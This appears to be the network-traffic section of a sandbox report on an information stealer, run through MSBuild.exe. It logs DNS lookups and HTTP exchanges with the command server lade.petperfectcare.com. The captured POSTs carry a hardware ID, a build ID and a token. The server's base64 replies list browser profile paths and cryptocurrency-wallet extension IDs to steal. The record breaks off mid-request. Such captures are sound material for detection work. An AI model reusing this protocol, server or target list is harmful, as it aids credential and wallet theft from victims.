                                                          Oct 7, 2024 18:47:20.553025961 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.560774088 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.560786963 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.600908995 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.600914001 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.636982918 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.678997993 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.679004908 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.725894928 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.732261896 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.772716999 CEST49769443192.168.2.413.107.246.45
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2024 18:46:32.413419008 CEST6290453192.168.2.41.1.1.1
                                                          Oct 7, 2024 18:46:32.428730965 CEST53629041.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 7, 2024 18:46:32.413419008 CEST192.168.2.41.1.1.10x29e0Standard query (0)lade.petperfectcare.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 7, 2024 18:46:11.535830975 CEST1.1.1.1192.168.2.40xfd6aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:46:11.535830975 CEST1.1.1.1192.168.2.40xfd6aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:46:12.080286026 CEST1.1.1.1192.168.2.40x535aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                          Oct 7, 2024 18:46:12.080286026 CEST1.1.1.1192.168.2.40x535aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:46:32.428730965 CEST1.1.1.1192.168.2.40x29e0No error (0)lade.petperfectcare.com95.164.90.97A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:47:07.238154888 CEST1.1.1.1192.168.2.40x5b6aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Oct 7, 2024 18:47:07.238154888 CEST1.1.1.1192.168.2.40x5b6aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:47:13.710243940 CEST1.1.1.1192.168.2.40xe161No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 18:47:13.710243940 CEST1.1.1.1192.168.2.40xe161No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                          • lade.petperfectcare.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44974395.164.90.97807436C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 7, 2024 18:46:32.463808060 CEST98OUTGET / HTTP/1.1
                                                          Host: lade.petperfectcare.com
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 7, 2024 18:46:33.638705015 CEST168INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0
                                                          Oct 7, 2024 18:46:33.642240047 CEST446OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIE
                                                          Host: lade.petperfectcare.com
                                                          Content-Length: 256
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a
                                                          Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
                                                          Oct 7, 2024 18:46:34.275516033 CEST232INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 3a1|1|1|1|7c6bbfba4ec648f9a73d86a3a5f9c771|1|1|1|0|0|50000|10
                                                          Oct 7, 2024 18:46:34.276621103 CEST521OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGI
                                                          Host: lade.petperfectcare.com
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a
                                                          Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="mode"1------BFIIIDAFBFBKECBGDBGI--
                                                          Oct 7, 2024 18:46:34.937433958 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED]
                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
                                                          Oct 7, 2024 18:46:34.937990904 CEST491INData Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57
                                                          Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
                                                          Oct 7, 2024 18:46:34.939420938 CEST521OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH
                                                          Host: lade.petperfectcare.com
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a
                                                          Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"2------KFHJJDHJEGHJKECBGCFH--
                                                          Oct 7, 2024 18:46:35.929681063 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED]
                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
                                                          Oct 7, 2024 18:46:35.929750919 CEST224INData Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a
                                                          Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF
                                                          Oct 7, 2024 18:46:35.929760933 CEST1236INData Raw: 38 4d 48 77 77 66 45 56 57 52 56 49 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 64 6c 5a 57 39 6b 63 47 5a 68 5a 32 70 6a 5a 57 56 6d 61 57 56 6d 62 47 31 6b 5a 6e 42 6f 63 47 78 72 5a 57 35 73 5a 6d 74 38 4d 58 77 77 66 44 42 38 53 32 46 79 5a
                                                          Data Ascii: 8MHwwfEVWRVIgV2FsbGV0fDF8Y2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8MXwwfDB8S2FyZGlhQ2hhaW58MXxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXwxfGFjbWFjb2RramJkZ21vbGVlYm9sbWRqb25pbGtkYmNofDF8MHwwfFBoYW50b218MXxiZm5hZWxtb21laW1obH
                                                          Oct 7, 2024 18:46:35.929909945 CEST1236INData Raw: 6c 63 48 42 6e 5a 48 42 6f 66 44 46 38 4d 48 77 77 66 45 56 34 62 32 52 31 63 79 42 58 5a 57 49 7a 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6f 62 32 78 77 5a 6d 52 70 59 57 78 71 5a 32 70 6d 61 47 39 74 61 57 68 72 61 6d 4a 74 5a 32 70 70 5a
                                                          Data Ascii: lcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW1lamRtYXwxfDB8MHxFbmtyeXB0fDF8a2twbGxrb2RqZWxvaWRpZWVkb2pvZ2FjZmhwYWlob2h8MXwwfDB8T0tYIFdlYjMgV2
                                                          Oct 7, 2024 18:46:35.929923058 CEST1236INData Raw: 76 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 4a 6e 61 6d 39 6e 63 47 39 70 5a 47 56 71 5a 47 56 74 5a 32 39 76 59 32 68 77 62 6d 74 74 5a 47 70 77 62 32 4e 6e 61 32 68 68 66 44 46 38 4d 48 77 77 66 45 4e 76 61 57 35 6f 64 57 4a 38 4d 58 78 71 5a
                                                          Data Ascii: vIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfDF8MHwwfENvaW5odWJ8MXxqZ2FhaW1hamlwYnBkb2dwZGdsaGFwaGxkYWtpa2dlZnwxfDB8MHxMZWFwIENvc21vcyBXYWxsZXR8MXxmY2ZjZmxsZm5kbG9tZGhiZWhqamNvaW1iZ29mZG5jZ3wxfDB8MHxNdWx0aXZlcnNYIERlRmkgV2FsbGV0fD
                                                          Oct 7, 2024 18:46:35.929944992 CEST680INData Raw: 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59
                                                          Data Ascii: pYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYW
                                                          Oct 7, 2024 18:46:35.930186033 CEST680INData Raw: 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59
                                                          Data Ascii: pYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYW
                                                          Oct 7, 2024 18:46:35.930454969 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED]
                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
                                                          Oct 7, 2024 18:46:35.931319952 CEST522OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH
                                                          Host: lade.petperfectcare.com
                                                          Content-Length: 332
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
